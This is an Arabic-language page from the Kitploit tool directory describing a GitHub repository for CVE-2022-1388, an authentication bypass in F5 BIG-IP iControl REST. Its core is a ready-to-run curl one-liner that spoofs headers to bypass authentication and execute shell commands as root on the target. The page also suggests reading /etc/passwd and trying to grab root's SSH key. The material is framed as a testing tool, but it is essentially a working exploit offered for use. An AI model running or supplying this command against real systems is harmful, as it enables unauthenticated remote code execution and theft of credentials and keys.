Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1388 — سطر واحد من cURL لاختبار CVE-2022-1388 BIG-IP iControl REST RCE | Kitploit
أدوات/GitHubGitHub/thinkingoffensively/cve-2022-1388
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubthinkingoffensively/cve-2022-1388

CVE-2022-1388

سطر واحد من cURL لاختبار CVE-2022-1388 BIG-IP iControl REST RCE

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-1388 BIG IP REST RCE

في إصدارات F5 BIG-IP 16.1.x قبل 16.1.2.2، وإصدارات 15.1.x قبل 15.1.5.1، وإصدارات 14.1.x قبل 14.1.4.6، وإصدارات 13.1.x قبل 13.1.5، وجميع إصدارات 12.1.x و11.6.x، قد تتجاوز الطلبات غير المفصح عنها مصادقة iControl REST.

استخدم أمر cURL التالي في سطر واحد لاختبار هذه الثغرة.

curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

يمكن أن يكون حقل Authorization أي قيمة مشفرة بصيغة base64. المثال أعلاه يستخدم admin:admin. لا تحتاج هذه إلى أن تكون بيانات اعتماد صالحة؛ إذا كان الخادم عرضة للثغرة، فإن أي قيمة مشفرة بصيغة base64 ستعمل.

إذا أرجعت الأمر أعلاه المعرّف (ID)، يمكنك تجربة عدد من الأشياء مثل قراءة /etc/passwd باستخدام 'cat /etc/passwd'، أو محاولة الحصول على شهادة SSH الخاصة بالجذر باستخدام 'cat /root/.ssh/identity'.

تنزيل الأداة